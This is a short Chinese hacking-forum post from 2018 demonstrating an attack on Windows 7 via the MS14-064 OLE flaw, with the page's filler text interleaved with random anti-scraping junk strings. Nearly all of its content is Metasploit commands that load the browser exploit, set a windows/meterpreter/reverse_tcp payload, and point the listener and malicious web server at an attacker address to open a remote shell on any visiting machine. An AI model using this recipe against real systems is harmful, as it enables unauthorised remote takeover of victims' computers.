找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1585|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

4 k- _1 T! x8 C9 |0 P4 q 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 $ b7 O& Z7 C" m3 M% w

6 d! p( I( S! i1 @3 q

0 O; I$ l6 o$ B( l, X) S$ \ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , t' \1 u6 c% v; r5 s, S

- P) |8 O0 S b6 m" v) E2 z! H

# U- h$ k. Y) } 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp - ~; t- c- U& W, z4 l: z

* o( b8 o) o5 R6 l& |

" Y" i$ w6 k' c) v2 ^             set AllowPowershellPrompt true# ]# D. S* `, j/ q1 {8 X

* N' W4 o, [. D5 n, e" O

& L! m% N7 w* n4 N% b" K4 X! @             Set LHOST 192.168.0.109 4 A0 s. o( s. r( l1 ]

+ |1 _* a7 U( S- m% S s

2 O* o0 V8 ^% e" s             set SRVHOST 192.168.0.109# i6 |6 v8 @( S% f

4 {# u) \3 k8 Q9 r7 J0 d) ~

, |# z* }7 A( Q             Set uripath share0 S Q' z, b; y) Q7 ]+ d

& a! [. I, V$ G6 ~

, e7 a2 }& Q; M             Set srvport 80 : j# z' @) c6 y+ x0 v: i

# @' {. N$ r# f3 D( z5 n) ]

) i9 y, }7 |% j: i   : u5 d# E' [9 S0 B$ y

+ E4 d5 D+ d1 e

3 W% N3 k+ D& h0 N$ u   + s& Y5 I' f6 A1 c2 C

8 K) B; A" y; \+ i3 x* S

3 f# ]: v" N2 I a2 Z I6 t# p   ! t9 f4 a: i: u

/ {2 O4 a0 k/ J- I

$ k- H1 Q9 ?* R; l- ?) N+ T# \   * U" Q! R2 @ |% G+ k

! t' K5 P- k3 J& h& P" \3 y F

5 X2 B; `! P0 b! n0 U   ' P( z. ` o" M) o6 {2 U

# E$ N/ k$ y- T8 F+ O" I

& j8 w S- M' N8 B2 o9 u 下面我们来访问本地地址如图:1 x5 a' F) z, b9 M

6 W. t( D/ o4 V1 N! ^4 K( H J1 a

" j' k, N& v, i! g   7 u; F% G, T: @* X+ r) m0 E9 M/ W0 B

$ {# t+ O9 C3 i* k; |4 X* f' ?1 v7 g

9 k' @, r) Z/ o# H& O2 h& }   5 K% e" V _- ~, s

. X! {, R; x+ `& e# j( {( ^0 ?$ f+ Z

' ^" y6 w% d% t8 W7 D - P' h0 a4 G6 V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表